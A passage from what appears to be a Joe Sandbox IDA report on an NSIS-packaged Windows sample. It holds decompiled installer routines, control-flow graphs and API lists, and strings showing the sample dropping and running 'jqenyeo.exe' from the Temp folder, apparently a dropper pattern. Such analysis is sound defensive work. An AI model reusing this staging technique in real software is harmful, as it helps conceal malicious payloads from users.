                                                          						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                          						goto L21;
                                                          					}
                                                          				} else {
                                                          					_t78 =  *(_t82 + 0x48);
                                                          					_t92 = _t78;
                                                          					if(_t78 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					_t76 = 0x428200;
                                                          					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                          					_t63 =  *0x428200; // 0x43
                                                          					if(_t63 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					if(_t63 == 0x22) {
                                                          						_t76 = 0x428202;
                                                          						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                          					}
                                                          					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                          					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                          						L15:
                                                          						E00406668(_t86, E00405F37(_t76));
                                                          						goto L16;
                                                          					} else {
                                                          						_t69 = GetFileAttributesW(_t76);
                                                          						if(_t69 == 0xffffffff) {
                                                          							L14:
                                                          							E00405F83(_t76);
                                                          							goto L15;
                                                          						}
                                                          						_t98 = _t69 & 0x00000010;
                                                          						if((_t69 & 0x00000010) != 0) {
                                                          							goto L15;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}

























                                                          0x00403d1d
                                                          0x00403d26
                                                          0x00403d2d
                                                          0x00403d2f
                                                          0x00403d43
                                                          0x00403d55
                                                          0x00403d5e
                                                          0x00403d67
                                                          0x00403d6e
                                                          0x00403d73
                                                          0x00403d7a
                                                          0x00403d8d
                                                          0x00403d8d
                                                          0x00403d98
                                                          0x00403d31
                                                          0x00403d31
                                                          0x00403d3c
                                                          0x00403d3c
                                                          0x00403d9d
                                                          0x00403da7
                                                          0x00403db0
                                                          0x00403db5
                                                          0x00403dc6
                                                          0x00403e58
                                                          0x00403e60
                                                          0x00403e69
                                                          0x00403e69
                                                          0x00403e7f
                                                          0x00403e85
                                                          0x00403e93
                                                          0x00403f14
                                                          0x00403f1c
                                                          0x00403f26
                                                          0x00403f2b
                                                          0x00403f31
                                                          0x00403fbb
                                                          0x00403fc0
                                                          0x00403fc2
                                                          0x00403fde
                                                          0x00000000
                                                          0x00403fde
                                                          0x00403fc4
                                                          0x00403fca
                                                          0x00403fd2
                                                          0x00403fd2
                                                          0x00000000
                                                          0x00403fca
                                                          0x00403f3f
                                                          0x00403f4a
                                                          0x00403f4f
                                                          0x00403f51
                                                          0x00403f58
                                                          0x00403f58
                                                          0x00403f63
                                                          0x00403f6b
                                                          0x00403f6d
                                                          0x00403f6f
                                                          0x00403f78
                                                          0x00403f7b
                                                          0x00403f81
                                                          0x00403f81
                                                          0x00403fa0
                                                          0x00403fb1
                                                          0x00000000
                                                          0x00403fb6
                                                          0x00403f1e
                                                          0x00403f20
                                                          0x00000000
                                                          0x00403e95
                                                          0x00403e95
                                                          0x00403ea1
                                                          0x00403eab
                                                          0x00403eb1
                                                          0x00403eb6
                                                          0x00403ec5
                                                          0x00403fe3
                                                          0x00403fe3
                                                          0x00000000
                                                          0x00403fe3
                                                          0x00403ed4
                                                          0x00403f0f
                                                          0x00000000
                                                          0x00403f0f
                                                          0x00403dcc
                                                          0x00403dcc
                                                          0x00403dcf
                                                          0x00403dd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00403ddf
                                                          0x00403df1
                                                          0x00403df6
                                                          0x00403dff
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e05
                                                          0x00403e07
                                                          0x00403e14
                                                          0x00403e14
                                                          0x00403e1d
                                                          0x00403e23
                                                          0x00403e4b
                                                          0x00403e53
                                                          0x00000000
                                                          0x00403e35
                                                          0x00403e36
                                                          0x00403e3f
                                                          0x00403e45
                                                          0x00403e46
                                                          0x00000000
                                                          0x00403e46
                                                          0x00403e41
                                                          0x00403e43
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e43
                                                          0x00403e23

                                                          APIs
                                                            • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                            • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D31
                                                            • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                          • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,?,?,?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7620FAA0), ref: 00403E18
                                                          • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,?,?,?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,?,00000000,?), ref: 00403E36
                                                          • LoadImageW.USER32 ref: 00403E7F
                                                          • RegisterClassW.USER32 ref: 00403EBC
                                                          • SystemParametersInfoW.USER32 ref: 00403ED4
                                                          • CreateWindowExW.USER32 ref: 00403F09
                                                          • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                          • GetClassInfoW.USER32 ref: 00403F6B
                                                          • GetClassInfoW.USER32 ref: 00403F78
                                                          • RegisterClassW.USER32 ref: 00403F81
                                                          • DialogBoxParamW.USER32 ref: 00403FA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 606308-1630153654
                                                          • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                          • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                          • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                          • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 324 403120-403125 321->324 325 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 321->325 326 40336a-40336e 324->326 333 403243-403251 call 40302e 325->333 334 40315e 325->334 340 403322-403327 333->340 341 403257-40325a 333->341 335 403163-40317a 334->335 338 40317c 335->338 339 40317e-403187 call 4035e2 335->339 338->339 347 40318d-403194 339->347 348 4032de-4032e6 call 40302e 339->348 340->326 343 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 341->343 344 40325c-403274 call 4035f8 call 4035e2 341->344 372 4032d4-4032d9 343->372 373 4032e8-403318 call 4035f8 call 403371 343->373 344->340 367 40327a-403280 344->367 351 403210-403214 347->351 352 403196-4031aa call 406113 347->352 348->340 357 403216-40321d call 40302e 351->357 358 40321e-403224 351->358 352->358 370 4031ac-4031b3 352->370 357->358 363 403233-40323b 358->363 364 403226-403230 call 406b22 358->364 363->335 371 403241 363->371 364->363 367->340 367->343 370->358 376 4031b5-4031bc 370->376 371->333 372->326 381 40331d-403320 373->381 376->358 378 4031be-4031c5 376->378 378->358 380 4031c7-4031ce 378->380 380->358 382 4031d0-4031f0 380->382 381->340 384 403329-40333a 381->384 382->340 383 4031f6-4031fa 382->383 385 403202-40320a 383->385 386 4031fc-403200 383->386 387 403342-403347 384->387 388 40333c 384->388 385->358 389 40320c-40320e 385->389 386->371 386->385 390 403348-40334e 387->390 388->387 389->358 390->390 391 403350-403368 call 406113 390->391 391->326
                                                          C-Code - Quality: 98%
                                                          			E004030D0(void* __eflags, signed int _a4) {
                                                          				DWORD* _v8;
                                                          				DWORD* _v12;
                                                          				intOrPtr _v16;
                                                          				long _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				signed int _v40;
                                                          				short _v560;
                                                          				long _t54;
                                                          				void* _t57;
                                                          				void* _t62;
                                                          				intOrPtr _t65;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				long _t82;
                                                          				signed int _t89;
                                                          				intOrPtr _t92;
                                                          				long _t94;
                                                          				void* _t102;
                                                          				void* _t106;
                                                          				long _t107;
                                                          				long _t110;
                                                          				void* _t111;
                                                          
                                                          				_t94 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				 *0x42a26c = GetTickCount() + 0x3e8;
                                                          				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe", 0x400);
                                                          				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe", 0x80000000, 3);
                                                          				 *0x40a018 = _t106;
                                                          				if(_t106 == 0xffffffff) {
                                                          					return L"Error launching installer";
                                                          				}
                                                          				E00406668(0x436800, L"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe");
                                                          				E00406668(0x439000, E00405F83(0x436800));
                                                          				_t54 = GetFileSize(_t106, 0);
                                                          				 *0x420f00 = _t54;
                                                          				_t110 = _t54;
                                                          				if(_t54 <= 0) {
                                                          					L24:
                                                          					E0040302E(1);
                                                          					if( *0x42a274 == _t94) {
                                                          						goto L32;
                                                          					}
                                                          					if(_v12 == _t94) {
                                                          						L28:
                                                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                          						_t111 = _t57;
                                                          						E00406B90(0x40ce68);
                                                          						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                                                          						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                          						 *0x40a01c = _t62;
                                                          						if(_t62 != 0xffffffff) {
                                                          							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                          							 *0x420f04 = _t65;
                                                          							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                          							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                          							if(_t68 == _v20) {
                                                          								 *0x42a270 = _t111;
                                                          								 *0x42a278 =  *_t111;
                                                          								if((_v40 & 0x00000001) != 0) {
                                                          									 *0x42a27c =  *0x42a27c + 1;
                                                          								}
                                                          								_t45 = _t111 + 0x44; // 0x44
                                                          								_t70 = _t45;
                                                          								_t102 = 8;
                                                          								do {
                                                          									_t70 = _t70 - 8;
                                                          									 *_t70 =  *_t70 + _t111;
                                                          									_t102 = _t102 - 1;
                                                          								} while (_t102 != 0);
                                                          								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                                          								E00406113(0x42a280, _t111 + 4, 0x40);
                                                          								return 0;
                                                          							}
                                                          							goto L32;
                                                          						}
                                                          						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                          					}
                                                          					E004035F8( *0x420ef0);
                                                          					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                                          						goto L32;
                                                          					} else {
                                                          						goto L28;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t107 = _t110;
                                                          						asm("sbb eax, eax");
                                                          						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                          						if(_t110 >= _t82) {
                                                          							_t107 = _t82;
                                                          						}
                                                          						if(E004035E2(0x418ef0, _t107) == 0) {
                                                          							E0040302E(1);
                                                          							L32:
                                                          							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                          						}
                                                          						if( *0x42a274 != 0) {
                                                          							if((_a4 & 0x00000002) == 0) {
                                                          								E0040302E(0);
                                                          							}
                                                          							goto L20;
                                                          						}
                                                          						E00406113( &_v40, 0x418ef0, 0x1c);
                                                          						_t89 = _v40;
                                                          						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                          							_a4 = _a4 | _t89;
                                                          							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                          							_t92 = _v16;
                                                          							 *0x42a274 =  *0x420ef0;
                                                          							if(_t92 > _t110) {
                                                          								goto L32;
                                                          							}
                                                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                          								_v12 = _v12 + 1;
                                                          								_t110 = _t92 - 4;
                                                          								if(_t107 > _t110) {
                                                          									_t107 = _t110;
                                                          								}
                                                          								goto L20;
                                                          							} else {
                                                          								break;
                                                          							}
                                                          						}
                                                          						L20:
                                                          						if(_t110 <  *0x420f00) {
                                                          							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                          						}
                                                          						 *0x420ef0 =  *0x420ef0 + _t107;
                                                          						_t110 = _t110 - _t107;
                                                          					} while (_t110 != 0);
                                                          					_t94 = 0;
                                                          					goto L24;
                                                          				}
                                                          			}




























                                                          0x004030db
                                                          0x004030de
                                                          0x004030e1
                                                          0x004030fb
                                                          0x00403100
                                                          0x00403113
                                                          0x00403118
                                                          0x0040311e
                                                          0x00000000
                                                          0x00403120
                                                          0x00403131
                                                          0x00403142
                                                          0x00403149
                                                          0x00403151
                                                          0x00403156
                                                          0x00403158
                                                          0x00403243
                                                          0x00403245
                                                          0x00403251
                                                          0x00000000
                                                          0x00000000
                                                          0x0040325a
                                                          0x00403286
                                                          0x0040328b
                                                          0x00403296
                                                          0x00403298
                                                          0x004032a9
                                                          0x004032c4
                                                          0x004032cd
                                                          0x004032d2
                                                          0x004032f1
                                                          0x00403301
                                                          0x00403313
                                                          0x00403318
                                                          0x00403320
                                                          0x0040332d
                                                          0x00403335
                                                          0x0040333a
                                                          0x0040333c
                                                          0x0040333c
                                                          0x00403344
                                                          0x00403344
                                                          0x00403347
                                                          0x00403348
                                                          0x00403348
                                                          0x0040334b
                                                          0x0040334d
                                                          0x0040334d
                                                          0x00403357
                                                          0x00403363
                                                          0x00000000
                                                          0x00403368
                                                          0x00000000
                                                          0x00403320
                                                          0x00000000
                                                          0x004032d4
                                                          0x00403262
                                                          0x00403274
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040315e
                                                          0x00403163
                                                          0x00403168
                                                          0x0040316c
                                                          0x00403173
                                                          0x0040317a
                                                          0x0040317c
                                                          0x0040317c
                                                          0x00403187
                                                          0x004032e0
                                                          0x00403322
                                                          0x00000000
                                                          0x00403322
                                                          0x00403194
                                                          0x00403214
                                                          0x00403218
                                                          0x0040321d
                                                          0x00000000
                                                          0x00403214
                                                          0x0040319d
                                                          0x004031a2
                                                          0x004031aa
                                                          0x004031d0
                                                          0x004031df
                                                          0x004031e5
                                                          0x004031ea
                                                          0x004031f0
                                                          0x00000000
                                                          0x00000000
                                                          0x004031fa
                                                          0x00403202
                                                          0x00403205
                                                          0x0040320a
                                                          0x0040320c
                                                          0x0040320c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004031fa
                                                          0x0040321e
                                                          0x00403224
                                                          0x00403230
                                                          0x00403230
                                                          0x00403233
                                                          0x00403239
                                                          0x00403239
                                                          0x00403241
                                                          0x00000000
                                                          0x00403241

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004030E4
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xeWd55M5Lb.exe,00000400), ref: 00403100
                                                            • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\xeWd55M5Lb.exe,80000000,00000003), ref: 0040615C
                                                            • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\xeWd55M5Lb.exe,C:\Users\user\Desktop\xeWd55M5Lb.exe,80000000,00000003), ref: 00403149
                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xeWd55M5Lb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-1576854027
                                                          • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                          • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                          • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                          • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 458 40176f-401794 call 402da6 call 405fae 463 401796-40179c call 406668 458->463 464 40179e-4017b0 call 406668 call 405f37 lstrcatW 458->464 469 4017b5-4017b6 call 4068ef 463->469 464->469 473 4017bb-4017bf 469->473 474 4017c1-4017cb call 40699e 473->474 475 4017f2-4017f5 473->475 482 4017dd-4017ef 474->482 483 4017cd-4017db CompareFileTime 474->483 476 4017f7-4017f8 call 406133 475->476 477 4017fd-401819 call 406158 475->477 476->477 485 40181b-40181e 477->485 486 40188d-4018b6 call 4056ca call 403371 477->486 482->475 483->482 487 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 485->487 488 40186f-401879 call 4056ca 485->488 498 4018b8-4018bc 486->498 499 4018be-4018ca SetFileTime 486->499 487->473 520 401864-401865 487->520 500 401882-401888 488->500 498->499 502 4018d0-4018db FindCloseChangeNotification 498->502 499->502 503 402c33 500->503 505 4018e1-4018e4 502->505 506 402c2a-402c2d 502->506 507 402c35-402c39 503->507 510 4018e6-4018f7 call 4066a5 lstrcatW 505->510 511 4018f9-4018fc call 4066a5 505->511 506->503 517 401901-4023a2 call 405cc8 510->517 511->517 517->506 517->507 520->500 522 401867-401868 520->522 522->488
                                                          C-Code - Quality: 77%
                                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                          				void* __esi;
                                                          				void* _t35;
                                                          				void* _t43;
                                                          				void* _t45;
                                                          				FILETIME* _t51;
                                                          				FILETIME* _t64;
                                                          				void* _t66;
                                                          				signed int _t72;
                                                          				FILETIME* _t73;
                                                          				FILETIME* _t77;
                                                          				signed int _t79;
                                                          				WCHAR* _t81;
                                                          				void* _t83;
                                                          				void* _t84;
                                                          				void* _t86;
                                                          
                                                          				_t77 = __ebx;
                                                          				 *(_t86 - 8) = E00402DA6(0x31);
                                                          				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                          				_t35 = E00405FAE( *(_t86 - 8));
                                                          				_push( *(_t86 - 8));
                                                          				_t81 = L"C:\\U";
                                                          				if(_t35 == 0) {
                                                          					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
                                                          				} else {
                                                          					E00406668();
                                                          				}
                                                          				E004068EF(_t81);
                                                          				while(1) {
                                                          					__eflags =  *(_t86 + 8) - 3;
                                                          					if( *(_t86 + 8) >= 3) {
                                                          						_t66 = E0040699E(_t81);
                                                          						_t79 = 0;
                                                          						__eflags = _t66 - _t77;
                                                          						if(_t66 != _t77) {
                                                          							_t73 = _t66 + 0x14;
                                                          							__eflags = _t73;
                                                          							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                          						}
                                                          						asm("sbb eax, eax");
                                                          						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                          						__eflags = _t72;
                                                          						 *(_t86 + 8) = _t72;
                                                          					}
                                                          					__eflags =  *(_t86 + 8) - _t77;
                                                          					if( *(_t86 + 8) == _t77) {
                                                          						E00406133(_t81);
                                                          					}
                                                          					__eflags =  *(_t86 + 8) - 1;
                                                          					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                          					__eflags = _t43 - 0xffffffff;
                                                          					 *(_t86 - 0x38) = _t43;
                                                          					if(_t43 != 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					__eflags =  *(_t86 + 8) - _t77;
                                                          					if( *(_t86 + 8) != _t77) {
                                                          						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                          						__eflags =  *(_t86 + 8) - 2;
                                                          						if(__eflags == 0) {
                                                          							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                          						}
                                                          						L31:
                                                          						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                          						__eflags =  *0x42a2e8;
                                                          						goto L32;
                                                          					} else {
                                                          						E00406668(0x40b5f8, _t83);
                                                          						E00406668(_t83, _t81);
                                                          						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                          						E00406668(_t83, 0x40b5f8);
                                                          						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                          						__eflags = _t64;
                                                          						if(_t64 == 0) {
                                                          							continue;
                                                          						} else {
                                                          							__eflags = _t64 == 1;
                                                          							if(_t64 == 1) {
                                                          								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                          								L32:
                                                          								_t51 = 0;
                                                          								__eflags = 0;
                                                          							} else {
                                                          								_push(_t81);
                                                          								_push(0xfffffffa);
                                                          								E004056CA();
                                                          								L29:
                                                          								_t51 = 0x7fffffff;
                                                          							}
                                                          						}
                                                          					}
                                                          					L33:
                                                          					return _t51;
                                                          				}
                                                          				E004056CA(0xffffffea,  *(_t86 - 8));
                                                          				 *0x42a314 =  *0x42a314 + 1;
                                                          				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                          				 *0x42a314 =  *0x42a314 - 1;
                                                          				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                          				_t84 = _t45;
                                                          				if( *(_t86 - 0x24) != 0xffffffff) {
                                                          					L22:
                                                          					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                          				} else {
                                                          					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                          					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                          						goto L22;
                                                          					}
                                                          				}
                                                          				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                          				__eflags = _t84 - _t77;
                                                          				if(_t84 >= _t77) {
                                                          					goto L31;
                                                          				} else {
                                                          					__eflags = _t84 - 0xfffffffe;
                                                          					if(_t84 != 0xfffffffe) {
                                                          						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                          					} else {
                                                          						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                          						lstrcatW(_t81,  *(_t86 - 8));
                                                          					}
                                                          					_push(0x200010);
                                                          					_push(_t81);
                                                          					E00405CC8();
                                                          					goto L29;
                                                          				}
                                                          				goto L33;
                                                          			}


















                                                          0x0040176f
                                                          0x00401776
                                                          0x00401782
                                                          0x00401785
                                                          0x0040178a
                                                          0x0040178d
                                                          0x00401794
                                                          0x004017b0
                                                          0x00401796
                                                          0x00401797
                                                          0x00401797
                                                          0x004017b6
                                                          0x004017bb
                                                          0x004017bb
                                                          0x004017bf
                                                          0x004017c2
                                                          0x004017c7
                                                          0x004017c9
                                                          0x004017cb
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017db
                                                          0x004017db
                                                          0x004017ec
                                                          0x004017ee
                                                          0x004017ee
                                                          0x004017ef
                                                          0x004017ef
                                                          0x004017f2
                                                          0x004017f5
                                                          0x004017f8
                                                          0x004017f8
                                                          0x004017ff
                                                          0x0040180e
                                                          0x00401813
                                                          0x00401816
                                                          0x00401819
                                                          0x00000000
                                                          0x00000000
                                                          0x0040181b
                                                          0x0040181e
                                                          0x00401874
                                                          0x00401879
                                                          0x004015b6
                                                          0x0040292e
                                                          0x0040292e
                                                          0x00402c2a
                                                          0x00402c2d
                                                          0x00402c2d
                                                          0x00000000
                                                          0x00401820
                                                          0x00401826
                                                          0x0040182d
                                                          0x0040183a
                                                          0x00401845
                                                          0x0040185b
                                                          0x0040185b
                                                          0x0040185e
                                                          0x00000000
                                                          0x00401864
                                                          0x00401864
                                                          0x00401865
                                                          0x00401882
                                                          0x00402c33
                                                          0x00402c33
                                                          0x00402c33
                                                          0x00401867
                                                          0x00401867
                                                          0x00401868
                                                          0x00401493
                                                          0x0040239d
                                                          0x0040239d
                                                          0x0040239d
                                                          0x00401865
                                                          0x0040185e
                                                          0x00402c35
                                                          0x00402c39
                                                          0x00402c39
                                                          0x00401892
                                                          0x00401897
                                                          0x004018a5
                                                          0x004018aa
                                                          0x004018b0
                                                          0x004018b4
                                                          0x004018b6
                                                          0x004018be
                                                          0x004018ca
                                                          0x004018b8
                                                          0x004018b8
                                                          0x004018bc
                                                          0x00000000
                                                          0x00000000
                                                          0x004018bc
                                                          0x004018d3
                                                          0x004018d9
                                                          0x004018db
                                                          0x00000000
                                                          0x004018e1
                                                          0x004018e1
                                                          0x004018e4
                                                          0x004018fc
                                                          0x004018e6
                                                          0x004018e9
                                                          0x004018f2
                                                          0x004018f2
                                                          0x00401901
                                                          0x00401906
                                                          0x00402398
                                                          0x00000000
                                                          0x00402398
                                                          0x00000000

                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
